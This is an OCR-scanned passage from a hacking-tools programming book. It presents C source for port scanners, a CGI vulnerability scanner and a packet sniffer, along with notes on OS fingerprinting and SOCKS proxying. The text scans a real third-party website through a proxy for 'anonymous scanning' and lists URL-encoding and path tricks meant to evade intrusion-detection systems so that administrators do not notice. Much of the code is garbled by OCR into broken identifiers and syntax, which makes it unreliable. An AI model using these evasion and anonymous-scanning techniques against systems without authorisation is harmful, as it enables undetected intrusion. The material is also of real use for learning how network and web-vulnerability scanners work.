This prevents other threads from accessing this portion of the code until the current 
thread finishes executing it. In the critical section, the sin port field of the address structure 
is filled, the connect () function is called, the results are output to the screen, the global vari- 
able port is incremented, and the socket descriptor (sd) is closed. 
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Although a multithreaded scanner is an improvement over its less-prolific relative, it has 
its own shortcomings, which are discussed in the next section, 





Listing 7.4. A multithreaded port scanner (ptscan.c) 





finclude <stdio.h> 
#include <stdlib.h> 
finclude <sys/types.h> 
finclude <sys/socket.h> 
finclude <netinet/in.h> 
#include <netdb,h> 
finclude <string.h> 
#include <pthread.h> 


#define THREADS MAX 255 


int port, portlow, porthigh; 
pthread mutex t lock = PTHREAD MUTEX INITIALIZER; 


void *scan(void *arg) 

i 
int sd; 
struct sockaddr in servaddr; 
struct servent *srvport; 
struct hostent* hp; 


char *argvl = (char*)arg: 


hp = gethostbyname (argv1); 

if (hp == NULL) { 
herror ("gethostbyname() failed"); 
exit (-1)}; 


I 


bzero(&servaddr, sizeof (servaddr)); 
servaddr.sin family = AF_INET; 
servaddr.sin_addr = *({(struct in_addr *)hp->h_addr); 


while (port < porthigh) 
{ 
if ( (sd = socket (PF INET, SOCK_STREAM, 0)) < 0) { 
perror("socket({) failed"); 
exit (-1); 


} 


pthread mutex lock(&lock); 
servaddr.sin port = htons(port); 


if ({connect(sd, (struct sockaddr *)4servaddr, sizeof(servaddr)) == Q) 
1 

srvport = getservbyport (htons (port), "tep"); 

if (srvport == NULL) 
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printf ("Open: $d (unknown) \n", port); 
else 

printf ("Open: #d (%s)\n", port, srvport->s_ name); 
fflush (stdout); 


port++; 
close (sd); 
pthread mutex unlock (&lock); 


int main(int argc, char *argv[)) 
{ 
pthread t threads(THREADS MAX]; 
int thread num; 
int i; 


if {arge != 5) { 
fprintf(stderr, “Usage: ts <address> <portlow> <porthigh> <num threads>\n", argv([0]); 
exit(-1); 


} 


thread num = atoi(argv[4]); 
if (thread num > THREADS MAX) 
fprintf(stderr, “too many threads requested"); 


portlow = atol(argv[2]}; 
porthigh = atoilargv[3])}; 
port = portlow; 


fprintf(stderr, "Running scan... \n"); 
for (i = 0; i < thread num; i++) 
if (pthread create (&threads[i], NULL, scan, argv[1]) != 0) 


fprintf(stderr, “error creating thread"); 


for (i = 0; i < thread num; i++) 
pthread join(threads[i], NULL); 


return 0; 





7.5. A Port Scanner on Nonblocking Sockets 


The multithreaded port scanner considered in the previous section does not work much faster 
than a regular nonthreading port scanner. The bottleneck is the connect () function in the 
critical section. Other threads are blocked, with a mutex object, from accessing this function 
until it finishes executing. That is, the connect () function practically blocks execution of 
the whole program; thus, multithreading does not result in any substantial performance 
enhancement, Forsaking a mutex object allows threads to interrupt the connect () function 


Chapter 7: PortScanners 103 


and to establish multiple simultaneous connections. In this case, however, it is difficult to 
make the scanner operate properly. I have seen multithreaded scanners, in which access to the 
connect () function is allowed to multiple simultaneous threads, but they are so inefficiently 
implemented that some of them work even slower than a regular nonthreading scanner. 
Multithreaded utilities have another shortcoming: They put a heavy workload on the system. 

Therefore, another approach to enhance performance is used: creating multiple non- 
blocked sockets within one process and simply monitoring their state. Such programs are 
called socket engines. 

A socket is placed into nonblocking mode by calling the fcnt1() function as follows: 

flags = fentl(sd, F_GETFL, 0); 


if (fentl(sd, F SETFL, flags | 0 NONBLOCK) == -1) { 
perror("fentl(} -- could not set nonblocking"); 
ex1ltt-L); 


} 

When the connect () function is called for a nonblocked TCP socket, the connection- 
establishing process is initiated (the first packet of the three-way TCP handshake is sent) and 
the EINPROGRESS error is immediately returned. The port scanner must be on the lookout for 
this error, which means that connection establishing has started and is in progress. In rare 
instances, when the server is on the same host as the client, a connection can be established 
right away; therefore, even for nonblocked sockets you have to monitor the connect () function 
to ensure that it executes successfully. 

The socket state is monitored using the select () function and the FD ZERO, FD SET, and 
FD ISSET macros. If a socket immediately becomes ready for read or write operations, a con- 
nection with the remote port has been established; that is, the port is in the listening mode. 

Listing 7.5 shows the source code for a port scanner based on nonblocking sockets. 
The scanner monitors three socket states: 


O state 0 — No socket created 
O state = 1 —Asocket created 
O state = 2 — The socket is in the listening mode 


In the command line, in addition to the address of the remote host and the port range, the 
time in seconds to wait for the socket to become ready is specified because the scanner checks 
this parameter. 

The remaining aspects of the scanner’s operation ought to be clear from the comments 
in the code, 


The source code is compiled as usual: 


# gcc scan-nonblock.c -o scan-nonblock 


Listing 7.5. A port scanner on nonblocked sockets (scan-nonblock.c) 





#include <stdio.h> 
#include <fcentl.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
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_—_— 


#include <netinet/in.h> 
#include <time.h> 
#include <errno.h> 
#include <unistd.h> 
#include <netdb.h> 
#include <stdlib.h> 
#include <string.h> 


// The maximum number of sockets scanned in one pass 
#define MAX_SOCK 50 


j* ee ee xf 
/* OQutputting information about the service using the sun port */ 
j* eS ee pp ag ia ee eg rt ie ed ge */ 


open port (int port) 
{ 
struct servent “srvport; 
Srvport = getservbyport (htons (port), “tep™); 
if (srvport == NULL) 
printf("Open: %d (unknown) \n", port); 
else 
printf ("Open: 4d (%s)\n", port, srvport->s. name) ; 
fflush (stdout); 


jr ee aR a Ene eR xf 
/* The main{} function */ 
j* pine apes el ppb Nac sf cok a ae gti oes * if 


main(int argc, char *argqv[]} 

{ 
/* BR structure to monitor the socket states */ 
struct usock_descr{ 


int sd; // Socket 
int state; // Socket's current state 
long timestamp; // Socket's opening time in ms 


unsigned short remoteport; // Remote port 
he 


struct useck_descr sockets [MAX_SOCK]; 
struct hostent* hp; 

struct sockaddr Be fis] servaddr; 

struct timeval tv = {0,0}; 

fd_set rfds, wids; 

int i, flags, max fd; 

int port, PORT LOW, PORT HIGH; 

int MAXTIME; 


1f ({arge != 5) { 


fprintf(stderr, "Usage: %s <address> <portlow> <porthigh> <timeout in sec>\n" 


exit (-l); 


} 


hp = gethostbyname (argv[1]); 


, arov[O))? 
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_— 


if (hp == NULL) { 
herror("gethostbyname() failed"); 


exit (-1); 
} 
PORT LOW = atoi(argv[2]); // Starting port 
PORT HIGH = atoi(argv[3]) + 1; // End port 
MAXTIME = atoilargv[4]); // Time in seconds to wait for the 


// socket to become ready 
fprintf(stderr, "Running scan...\n"); 


memset (&servaddr, 0, sizeof(servaddr)); 
servaddr.sin family = AF_INET; 
servaddr.sin_addr = *((struct in_addr *)hp->h_addr); 


/* Setting all sockets to 0 state */ 

port = PORT_LOW; 

For {i = 0; 1 < MAX SOCK; i++) 
sockets[i].state = O; 


/* Main loop runs until all ports are scanned. */ 
while (port < PORT HIGH) { 
/* Creating a socket, setting it to nonblocked mode, 
and setting its state to 1 {a nonblocked socket is created) */ 
for (i = 0; (i < MAX SOCK) && (port < PORT HIGH); i++) [ 


if (sockets[i].state — 0) { 
if ( (sockets[i].sd = socket(AF INET, SOCK STREAM, IPPROTO TCP) ) 
oe! te 
perror("socket() failed"); 
exit (-1)7 


] 
flags = fentl{sockets[i].sd, F_GETFL, 0); 
if(fcntl(sockets{i].sd, F_SETFL, flags | O_NONBLOCK) == -1) { 
perror("fentl() -- could not set nonblocking"); 
exit({-1); 
} 
sockets([i].state = 1; 
} 
} 
for (i = 0; (i < MAX_SOCK) && (port < PORT HIGH); i++) { 
/* Checking for state 1 sockets and attempting 
to connect with the remote port */ 
if (sockets[i].state == 1) { 
servaddr.sin_port = ntohs (port); 
if (connect (sockets[i].sd, (struct sockaddr *) &servaddr, 
sizeof (servaddr)) == -1) | 
/* The connect() call ended in an error other than EINPROGRESS; 
therefore, close the socket and set the state to 0. */ 


if (errno != EINPROGRESS) | 
shutdown (sockets[i].sd, 2); 
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close (sockets[i].sd); 
sockets[i].state = 0; 
} else 
/* The connect () call returned the EINPROGRESS error; 
therefore, set the socket's state to 2 to 
Walt for connection establishment. */ 
sockets[i].state = 2; 
} else { 
/* The connection was established right away; i.e., 
the port is open, outputting its information to the screen. */ 
open port (port); 
/* The socket can be closed and its state set to 0. */ 
shutdown (sockets[i].sd, 2); 
close (sockets[i].sd); 
sockets[i].state = 0; 


} 
/* Remembering the time the connection request was made 


and the remote port being probed */ 
sockets([i).timestamp = time (NULL) ; 
sockets[i].remoteport = port; 


port++; // Taking the next port to scan 


) 


/* Zeroing out descriptor sets */ 
FD ZERO(érfds) ; 

FD _ d2ERO(&wids) ; 

max fd = -1; 


for (i = 0; i < MAX SOCK; i++) { 

/* If the socket is in the listening mode, 
place it into the corresponding sets 
for the ensuing check. */ 

if (sockets[i].state == 2) { 

FD_SET(sockets[i].sd, éwfids); 
FD_SET(sockets[i].sd, érfds); 
if (sockets{i].sd > max_fd) 
max fd = sockets[i].sdj; 


} 


/* Checking the socket"s state */ 
select(max fd + 1, &rfds, éwfids, NULL, &tv); 


for (i = 0; i < MAX SOCK; i++) { 
if ({sockets[i].state == 2) [{ 

/* Checking if the given socket is in the descriptor set 
and ready for read or write operations */ 

if (FD_ISSET(sockets[i].sd, &wfds) || FD _ISSET(sockets[i] .sd, 

Srfds)) { 

int error; 
socklen_t err len = sizeof{error); 
/* Checking for a connection error */ 
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_— 


if (getsockopt (sockets[1].sd, SOL SOCKET, 50 ERROR, &error, 
gerr len) < 0 || error [= 0) { 
/* If a connection error, close the socket 
and set its state to 0. */ 
shutdown (sockets[i]).sd, 2); 
close (sockets[i].sd); 
sockets [1i].state = 0; 
} else {| 
/* If no error, the connection established successfully, 
i.@., the port is open, outputting its information 
to the screen. */ 
open port (sockets[i}.remoteport); 
/* The socket can be closed and its state set to 0. */ 
shutdown (sockets[i].sd, 2); 
close (sockets[i].sd); 
sockets[i].state = 0; 
} 

+ else { 

/* If the socket i185 not ready for read or write operations, 
check how long it has been in this state; if the timeout in 
seconds specified in the command line has expired, 
close the socket and set its state to 0. */ 

if ( (time (NULL) - sockets[i]).timestamp) > MAXTIME) | 
shutdown (sockets[1].sd, 2) 7 
close (sockets [i] .sd); 
sockets[i].state = 0; 


return 0; 





7.6. Fingerprinting the TCP/IP Stack 


Some of the most progressive port scanners employ the stack fingerprinting technology to deter- 
mine the type and version of the remote host's operating system. The operating mechanism of this 
technology is based on different developers implementing the TCP/IP stack in different ways; 
in particular, they interpret RFC recommendations differently. Consequently, two operating sys- 
tems may react differently to the same request. The most complete description of the stack finger- 
printing process is given in the “Remote OS Detection via TCP/IP Stack fingerprinting” article by 
Fyodor in issue 54, item 9, of the Phrack magazine (also available at http://insecure.org/nmap/ 
nmap-fingerprinting-article.txt). The following is a partial list of tests that can be run to examine 
the stack to determine the type and version of the host’ s operating system: 


QO Sending a syn packet with different flags set, for example, SYN| FIN|URG| PSH, and with 
a different set of parameters to an open port. 
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Sending similar packets to a closed port. 

Sending a NULL packet (a packet with no flags set) with a set of different parameters to an 

open port. 

© Sending a FIN packet to an open port. Although according to RFC 793, the probed system 

does not have to reply to this message, some stack implementations (for example, in Win- 

dows NT) do reply to them, sending FIN/ACK. 

Checking the TCP initial window size, which has a specific value for certain TCP/IP stack 

implementations. 

Checking the Dr (don’t fragment) bit in IP headers. Some operating system set this bit in 

an attempt to enhance the performance. 

Checking the ack value. Different IP stack implementations set the value of the Ack field 

differently. In some cases, the sent sequence number is returned; in others, the sent se- 

quence number increased by 1. 

O Sending a UDP packet to a closed port. Some operating systems follow the RFC 1812 
recommendations and limit the transmission speed for error messages. Thus, the operat- 
ing system can be determined by counting the number of error messages that arrive 
within a certain period. 

O Determining the length of ICMP messages. The length of ICMP error messages differs 

from one system to another; thus, an educated guess can be made about the operating sys- 

tem type by analyzing a received ICMP error message. 


OO 


You can also think of and implement other tests. The nmap scanner runs a series of such 
tests to determine the operating system when executed with the -O command-line option. 
I don’t offer the source code for implementing stack fingerprinting, because by now you 
should have enough knowledge and skill to handle this task with ease. 





Chapter 8: CGI Scanner 





Nowadays, security professionals no longer use the term common gateway interface (CGI) 
scanner, preferring instead such terms as security scanner or vulnerability scanner. CGI scanner 
appeared most relevant from the security standpoint when there were CGI application errors. 
CGI applications are becoming a thing of the past, being replaced by modern Web languages, 
such as PHP; therefore, CGI application errors are no longer of such great importance. I use 
the historical name, CGI scanner, on purpose, because | intend on showing you how to de- 
velop a simple application analogous to the first CGI scanners. It would be a mistake to think 
that a CGI scanner can only detect vulnerable CGI applications; it can find other vulnerable 
files and scripts on a remote Web server that have nothing to do with CGI, including those 
written in PHP. 

Modern security scanners are complete systems that perform all-encompassing security 
checks for known and unknown vulnerabilities, and offer capabilities of port scanners, pass- 
word pickers, and other hacker utilities, which are considered in this book. Some security 
scanners cost tens of thousands dollars. 

The first scanner to become widely known was named Whisker and was created by the 
hacker nicknamed Rain Forest Puppy. He says at his site (http://www.wiretrip.net/rfp) 
that Whisker no longer exists and recommends another scanner, based on Whisker, named 
Nikto by the hacker named Chris Sullo. Like Whisker, Nikto is written in Perl, and as they 
developed, both utilities accumulated additional functionalities, which are described in the 
usage instructions. 
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8.1. CGI Scanner Operating Principles and 
Implementation 


The operating principle of the CGI scanner is simple. A mandatory component of a CGI scan- 
ner is database of known vulnerable files and scripts, compiled from Bugtraq messages. 
The following is an example of some data from such a database: 

fegi-bin/account .cgi 

/?PageServices 

f/egi-bin/test-cgi 

/cgi-bin/webgais 

/seripts/tools/newdsn.exe 

/ wtl prt/?.4 

/catalog type.asp 

/cgi-bin/formmail.pl 

The scanner sequentially requests all items in its database from a Web server. If the re- 
quested vulnerable file or script is present at the server, the latter announces that the request 
succeeded and the scanner outputs a message that a vulnerable script or file was detected. 
In this way, the scanner goes through the entire database and through the specified address 
range (if the latter capability is provided). 

What should be done with the discovered vulnerabilities is up to the hackers. Usually, they 
search the Internet for the description of the vulnerability and use this information to break 
into the server. 

Listing 8.1, found later in this section, shows the source code for a simplest console CGI 
scanner, This CGI scanner supports operation through an HTTP proxy server for anonymous 
scanning, The following string must be passed to the scanner (entered in the command line): 

<name or IP address of the Web node probed >[:port] [proxy server's name or IP 

address] [:port] 

The only mandatory parameter is the name or IP address of the Web host being probed. 
Optional port numbers are specified after a colon. The token() function parses the arguments 
passed to the scanner and separates the host names or IP addresses from the port numbers. 
[f no port is specified, port 80 is used by default. 

The database of vulnerable files and scripts is stored in a text file named cgi-bugs.dat. 
The database size is on the small side because | assembled it only for the purpose of testing the 
scanner. Therefore, it cannot be used for a serious exploration of Web servers for vulnerabilities. 

The CGI scanner opens this file and reads each entry in it using the standard fgets () 
function executed in a loop. At each loop iteration, a connection with the remote host is estab- 
lished using the connect () function. The remote host is the Web server being probed, or the 
proxy server, if such was specified in the command line. 

The scanner operation is based on the application layer protocol HTTP/1.1; therefore, 
pursuant to RFC 2068 and the more recent RFC 2616, which describe this protocol, the scanner 
forms the following request: 


GET /the path to a script from_the database HTTP/1.1\r\n 
Host:<host's name or IP address>\r\n\r\n 
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If the connection is established using an HTTP proxy server, the request looks a bit different: 

GET http: //host_address/the path to_a script_from_the_ database HTTP/1.1\r\n 

Host:<host's name or IP address>\r\n\r\n 

That is, in the latter case, a complete uniform resource locator (URL) is specified. The fol- 
lowing are examples of probing an actual server. 

This is a regular request: 

GET /chat/xakep/login.aspx HTTP/1.1\r\n 

Host:www.xakep.ru\r\n\r\n 

And this is the same request made using a proxy server: 

GET http: //www.xakep. ru/chat/xakep/login.aspx HTTP/1.1\r\n 

Hostiwww.xakep.ru\rin\r\n 

The GET method is used to extract any data stored or generated by a resource. The scanner 
examines the reply for code 200 ox, which means that the requested item is present on the 
server. If the reply contains this code, the server outputs FOUND!!!; otherwise, Not Found 
is displayed. Successful hits are few and far between, the most common answers being the 
codes 404 Not Found and 403 Forbidden. All possible codes that a Web server can return are 
described in RFC 2068; however, for the purposes of the CGI scanner here they are of no interest. 

After the scanner receives the reply, it closes the connection using the close () function 
and then either starts a new loop iteration to check another item or terminates execution if the 
end of the cgi-bugs.dat file is reached. 

Instead of the GET method, the HEAD method can be used; it is analogous to the GET 
method, the only difference being that the server's reply to this request has no body. The GET 
method, however, is more reliable, because quite a few Web servers have the support of the 
HEAD method disabled. Some of the better CGI scanners allow you to select, which one of these 
methods to use. You can also implement this feature in your custom scanner. 

The following is an example of starting the CGI scanner and the results of its execution 
(the connection is established through a proxy server): 

# gcc cgi-scanner.c -o cgi-scanner 

¢# ./ogi-scanner www.xakep.ru:80 84.235.100.2:8080 


Simple command line CGI scanner 
= by Ivan Sklyaroff, 2006 = 


me ee ee ee ee ee ee ee ee 


Start scanning "“www.xakep.ru:80"... 














GET http: //www.xakep.ru:80/cgi-bin/account.cgi HTTP/1.1 
Host :www.xakep.ru:80 


HTTP/1.1 404 Not Found 
Proxy-Connection: Keep-Alive 
Connection: Keep-Alive 
Content-Length: 103 
Content-Type: text/html 
Server: Microsoft-IIs/6.0 
X-Powered-By: ASP.NET 
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Date: Sun, 02 Jul 2006 00:27:42 GMT 
<html ><head><title>Error</title></he 


Result: Not Found. 


eee ee eee ee ee 





GET http: //www.xakep.ru:80/?PageServices HTTP/1.1 
Host : www. xakep. ru: 80 


HTTP/1.1 200 OK 

Proxy-Connection: Keep-Alive 

Connection: Keep-Alive 

Date: Sun, 02 Jul 2006 00:27:46 GMT 

Server: Microsoft-IIs/6é.0 

X-Powered-By: ASP.NET 

Last-Modified: 02.07.2006 3:27:44 
Content-Type: text/html; charset=windows-1251 
Content—L 


Result: FOUND!!! 


GET http://www. xakep.ru:80/cgi-bin/test-cgi HTTP/1.1 
Host: www. xakep.ru:80 


HTTP/1.1 404 Not Found 
Proxy-Connection: Keep-Alive 
Connection: Keep-Alive 
Content-Length: 103 

Content-Type: text/html 

Server: Microsoft-11I3S/6.0 
X-Powered-By: ASP.NET 

Date: Sun, 02 Jul 2006 00:27:58 GMT 


“<html ><head>=<title>Error</title></he 


Result: Not Found, 





The scanner outputs 250 bytes of the received data after each request. To display the results, 
only the following line of code must be deleted or commented out: printf ("%s\n", buf), 

As a way of protecting against CGI] scanners, administrators sometimes replace the error 
code 404 page with a custom page. In this case, the scanner will produce the FOUND!!! result 
for each nonexistent file or script, because the server will always return code 200 for such 
items. Administrators can also place on the server fake files and scripts named as, but not ac- 
tually being, known vulnerable items. 

Therefore, outputting the body of the answer, or at least a part of it, can be useful for analy- 
ses of whether the positive result was produced by a real vulnerable script or by a fake one. 
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The source code for the CGI scanner and the vulnerable script database file cgi-bugs.dat 
can be found in the /PART II/Chapter 8 folder on the accompanying CD-ROM. 





Listing 8.1. The source code for the CGI scanner (cgi-scanner.c) 





finclude <stdio.h> 
#include <stdlib.h> 
#include <sys/types.h> 
finclude <sys/socket.h> 
#include <netinet/in.h> 
#include <netdb.h> 
#include <string.h> 


char *port_host; 
char *name; 


void token(char *arg) 

{ 
name = strtok(arg, ":"); 
port host = strtok(NULL, ""); 


if (port host == NULL) 
port_host = "sd"; 
I 


int main(int argc, char* argv[]) 
{ 

FILE *fd; 

int sd; 

int bytes; 

char buft[250); 

char str1l[270]; 

char str#[100); 

struct hostent* host; 

struct sockaddr in servaddr; 


if (argc < 2 {| arge > 3) { 
printft("Usage: ts host[:port] [proxy] [:port]\n\n", argv[0]); 
exit(-1); 
} 
fprintf(stderr, "s=Sss=ssssssssssssssssssssssSssssese=\n")} 
fprintf(stderr, "= Simple command line CGI scanner =\n"); 
fprintf(stderr, "= by Ivan Sklyaroff, 2006 =\n"); 
fprintf(stderr, “SsS=sss=sss=ssSSssSsssSssseseeeseeese=\n"); 





if (argc = 3) 
token (argv([2]); 

else 
token(argv(1]); 


if ( (host = gethostbyname (name)}) == NULL) { 
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herror("gethostbyname() failed"); 
exit(-1); 


} 


bzero(&servaddr, sizeof (servaddr)); 

servaddr.sin family = AF INET; 

servaddr.sin port = htons(atoi (port_host)); 
servaddr.sin_addr = *((struct in_addr *)host->h_addr); 


if( (fd = fopen("cgi-bugs.dat","r")) == NULL) { 
perror("fopen() failed"); 
exit(-1); 


} 


fprintf(stderr, " Start scanning \"%s\"...\n", argv[1])); 


while (fqets(buf,250,fd) != NULL) { 


buf[strespnibuf, "\o\n\t"))] = 0; 
if (strlen(buf) == 0) continue; 


if { {sd = socket (PF INET, SOCK STREAM, 0)) < 0) { 
perror ("socket () failed"); 
exit(-1); 


} 


if {connect(sd, (struct sockaddr *)4servaddr, sizeof (servaddr)}) == -1) 
perror("connect() failed"); 
exit (-1); 
} 





printf (“sssssssssssssssssssssssesssssssssssse=\n") 7 
if ({arge == 2} 
sprintf(strl, "GET ts HTTP/1.1\r\n", buf); 
else 
sprintf(strl, “GET http://%s%s HTTP/1.1\r\n", argv[1)], buf); 


sprintf(str2, "Host:#s\r\n\r\n", argv[1]); 
send(sd, strl, strlen(strl), 0); 
pranti("$s", strl}; 

send(sd, str2, strlen(str2), 0); 

printf ("ts", str2); 

bzero(buf, 250); 

bytes = recv(sd, buf, sizeof(buf) - 1, 0}; 
buf[(bytes] = 0; 

printf("ts\n", but); 


if (strstr(buf, "200 OK") != NULL) 
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printf ("\nResult: FOUND! !!\n\n"); 
else 
printf("\nResult: Not Found. \n\n"); 


BUInNt£ ("sss2 eee ree esses eee ee ee 


close(sd); 


j 


fprintt (stderr, Wf --—--+ SSS SSS SS SS SS SSS SSS SSS Ss SSS Sse Nn) : 
fprintf(stderr, " End scan \"ts\".\n", argv[1)); 
fprintt (stderr, “s2=se22e22e ere EE e22eE sees 7)" ) ; 


fclose (id); 


return 0; 





8.2. Improving the Basic CGI Scanner 


The CGI scanner described in Section 8.1 is slow. One way of improving its lackluster per- 
formance is to add multithreading capability; another, an even better way, is to equip it with 
nonblocking socket support. Both of these enhancements were considered in Chapter 7. 

Nowadays, more and more Web servers use HTTP over SSL (HTTPS) to encrypt the traffic. 
For your CGI scanner to be able to explore such servers, you have to add SSL support to its 
code, How to do this is considered in Chapter 10. 

HTTP/1.1 is the Internet’s mainstream protocol, but every so often you may run into 
a server that works only with the obsolete 1.0 version. Requests to HTTP/1.0 servers are analo- 
gous to requests to HTTP/1.1 servers; only the Host field is not used: 

GET / the_path_to_a script from_the database HTTP/1.0\r\n\r\n 


HTTP/1.0 is described in RFC 1945, 
It would also be a good idea to make you scanner work with a list of proxy servers and to 
be able to specify a range of addresses for scanning. 


8.2.1. Circumventing the Intrusion-Detection Systems 


As important as detecting potential vulnerabilities in a server is preventing the server adminis- 
trator from detecting your activities. To this end, the scanner can be equipped with simple 
means of circumventing the intrusion-detection systems. The following are just a few sugges- 
tions of how this can be done: 


O Replace / with /./ in scanner requests: 
GET /,/path/script.cgi HTTP/1.1\r\n 
GET /./path/./script.cgi HTTP/1.1\r\n 
GET fa / . fpath/ ‘ fi. fi} « /SCript Col HTTP /1 * L\rin 
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Use several / sequences in a row: 
GET //path/script.cgi HTTP/1.1\r\n 
GET //path//script.cqi HTTP/1.1\r\n 
GET ///path////script.cqi HTTP/1.1\r\n 
[| Add fake paths using the ../ string, which means that the directory specified before this 
string 1s ignored: 
GET /path/fiction/../script.cgi HTTP/1.1i\r\n 
GET /path/fiction/../fiction2/../script.cgi HTTP/1.1\r\n 
GET /fiction/../path/fiction2/../script.cgi HTTP/1.1\r\n 
O Add fake parameters: 
GET /path/script.cgi?fiction=blah HTTP/1.1\r\n 
GET /path/script.cgi?fiction=blah&?fiction2z=blah2 HTTPF/1.1\r\n 
© Replace characters with their hexadecimal codes: 
GET /path/script%2Ecqi HTTP/1.1\r\n 
GET /path/S73¢633 722693708 T4$2Et63t67369 HTTP/1.1\r\n 
GET /$70%61%74%68 /373%633 724695 70S 74¢2E¢63367%69 HTTP/1.1\r\n 


All requests in the three preceding bullets are the same as this: 
GET /path/script.cgi HTTP/1.1\r\n 


All of these ways of throwing the hounds off the scent can be used in a single request. 


8.2.2. Working with SOCKS Proxy Servers 


Another way to enhance your CGI scanner is to add support for sockets (SOCKS) proxy serv- 
ers (versions 4 and 5) to it. The fifth version of SOCKS is described in RFC 1928. Program- 
ming both versions is the same. The major innovations in SOCKSv5 are user-identification 
support, working with UDP and ICMP, and resolving host names to their addresses. 

A connection using a SOCKS proxy is established in two stages. During the first stage, 
a greeting is sent and optional authentication performed. During the second stage, the server 
is passed the data about the destination node. 

The greeting is a message that a client sends after connecting to a SOCKS proxy server; 
it has the following format: 

1 byte: the version number 

l byte: the number (N) of methods 

N bytes: a list of the methods supported by the client 

The first byte is the number of the SOCKS version: 0x05 for version 5 and 0x04 for version 
4. The next byte is the number of the connection and authentication methods supported by 
the client; it is followed by a sequence of bytes describing these methods. The value of 0x00 for 
a method byte means that the client supports connection without authentication, 0x02 means 
that a user name and a password can be issued if necessary. SOCKS authentication is described 
in RFC 1929, 

A server must answer a SOCKS greeting from a client with 2 bytes: The first is the number 
of its own version, and the second is the connection and authentication methods selected 
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from the list sent by the client. If the proxy does not find suitable any of the methods offered 
by the client, the second byte of the reply will be 0xFr and further work with this server is not 
possible. The value of 0x00 allows the client to proceed to the next stage. 

During the second stage, the client must tell the SOCKS server the host, to which it wants 
to connect, and the connection method desired. To this end, it sends a packet with the follow- 
ing contents: 
byte: the version number 
pyte: a command 
byte: reserved (always Set to 0x00) 
byte: the type of the address, which must follow next 
bytes: the address of the remote host 
? bytes: the port on the remote host 


A 2S = — i 


The command byte can have one of the following values: 0x01 for a simple connection, 
0x02 for the BIND command, or 0x03 for the UDP ASSOCIATE command (for working using 
UDP for SOCKSv5). 

The address byte tells the SOCKS server the format of the address of the remote host; 
it can have one of the following values: 0x01 for an IPv4 address specified in 4 bytes in the net- 
work format, 0x03 for a host name as a regular string (in this case, the SOCKS server must 
convert the name to the corresponding IP address, which is not something all SOCKS servers 
can do), or 0x04 for the IPv6 address in the network format. 

In reply to this packet, the SOCKS server must send a packet with the same structure but 
with different values. For example, if the reply’s second byte, which corresponds to the request’s 
command, is not 0, there was an error establishing the connection, and the client must break the 
connection. The type of address and the address itself can also change; thus, if the address in the 
request was sent as a host name, in the reply it should be the corresponding IP address. 

If the connection was established successfully, the SOCKS server switches into the data 
transfer mode for sending any data to the address specified in the second stage. 

In the program, you must first define the structure of the packet that will be sent in the 
second stage. The following is an example of this definition for an IP host address: 


struct req { 


unsigned char ver; // SOCKS version number 
unsigned char cmd; // Command 

unsigned char rsv; // Reserved 

unsigned char type; // Address type 
unsigned char addr[4]; // IP address 

unsigned short socport; f/f Port 


}? 

Next, the following definitions must be included in the program: 

char *greeting = "\x05\x01\x00"; // Greeting sent in the first stage 

int greeting ans[2]; // Buffer to receive the reply to the greeting 

struct req temp; 

Then a socket is created, a connection with a SOCKS server is established using the 
connect () function, and the first-stage operations are carried out: A greeting is sent and the 
reply to it is received: 


send(sd, (char *) greeting, 3, 0); // Sending 2 bytes 
recvisd, (char *}) greeting ans, 2, 9); // Receiving 2 bytes 
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If there are no errors in the reply, move on to the second stage: 


if ((greeting ans[l] != OxFF) || (greeting ans [0) == 0x05)) 
{ 
// Filling the structure's fields 
temp.ver = 0x05; 
temp.cmd = 0x01; 
temp.type = 0x01; 
temp.rsv = 0x00; 
// Assuming the IP address of the host is stored in the sa structure 
// and copying it from there to the temp.addr field 
memcpy (temp.addr, &Sa.sin_ addr, 4); 
// The port must be specified in the network format. 
temp.socport = htons (80); 


// Sending the packet 

send(sd, (char*)&temp, sizeof(temp), 0); 

// Receiving the reply; it must be in the same structure. 
recvisd, (char*)é&temp, sizeof(temp), 0); 


// Checking the reply for any errors 

if ((temp.rsv = 0) |! (temp.cmd == 0)) { 
// Transferring control here if the connection was successful; 
// now all data will pass through SOCKS, 
// for example, sending a request. 
sprintf(strl, "GET / HTTP/1.1\r\n"); 
sprintf (str2, "Host:www.example.com\r\n\r\n") ; 
send(sd, strl, strlen(strl), 0); 
send(sd, strz, strlen(str2), 0); 

} 

} 


The preceding information should make it easy for you to add SOCKS proxy server sup- 
port to the CGI scanner and to any other program. 
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A sniffer is a network traffic analyzer. Usually, any network analyzer is called a sniffer, but the 
word sniffer is a registered trademark of Network Associates, which markets its network 
analyzers under this name. 

A sniffer may be implemented as a regular software package or as a software-and- 
hardware device for analyzing traffic in a specific network environment. This book considers 
only software sniffers, which can be installed on a regular computer equipped with a network 
card and which intercept Ethernet network traffic. 

Based on the way software sniffers monitor a network, they are divided into two classes: 
passive and active. 

A. passive sniffer can only analyze the traffic that passes through the network card of the 
computer, on which it is installed. An active sniffer can force the necessary traffic from another 
network segment to the network card of its computer. This chapter considers both types of 
sniffers. Although not mandatory for understanding the material presented in this chapter, 
Problem 2.2 from my book Puzzles for Hackers provides additional information on the subject. 


9.1. Passive Sniffers 


Listing 9.2 later in this section shows the complete source code for a simplest passive sniffer. 

It can also be found in the /PART II/Chapter 9 directory on the accompanying CD-ROM. 
Because this sniffer analyzes the headers of all layers in a received packet, including the 

data link (Ethernet) header, the program needs to have a packet socket created (see Section 3.5.3). 
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An Ethernet packet can be no larger than 1,500 bytes, so a corresponding receiving buffer, 
named buf [1500], is prepared. 

By default, a network card receives only packets addressed specifically to it. But a sniffer 
must receive all packets in the network segment for their subsequent analyses; therefore, 
it must first switch the network card into the promiscuous mode. This will allow it to receive 
all packets, regardless of their destination. The promiscuous mode could be enabled using the 
ifconfig utility (see Section 1.2), but a full-fledged sniffer must be able to switch on the pro- 
miscuous mode programmatically itself. The promiscuous mode is enabled by the portion of 
the code shown in Listing 9.1. 


Listing 9.1. Setting the promiscuous mode 


struct ifreq iff; 
strepy(1fr.ifr name, DEVICE); 


/* Getting the flaq values */ 

if {iectl(sd, SIOCGIFFLAGS, &ifr) < 0) { 
perror("ioctl() failed”); 
close (sd); 
exit (-1); 

} 


/* Adding a new flag */ 
ifr.ifr flags |= IFF_PROMISC; 


/* Setting the interface flags to new values */ 
if (ioctl (sd, SICCSIFFLAGS, 4ifr) < 0) { 
perror("ioctl() failed"); 
close (sd); 
exit (-1); 


Then an endless loop is started, in which a packet is received using the recvfrom() 
function, and the PrentHeadres () function is called, to which a pointer to the received packet 
is passed. The PrintHeaders () function parses the packet for individual headers and outputs 
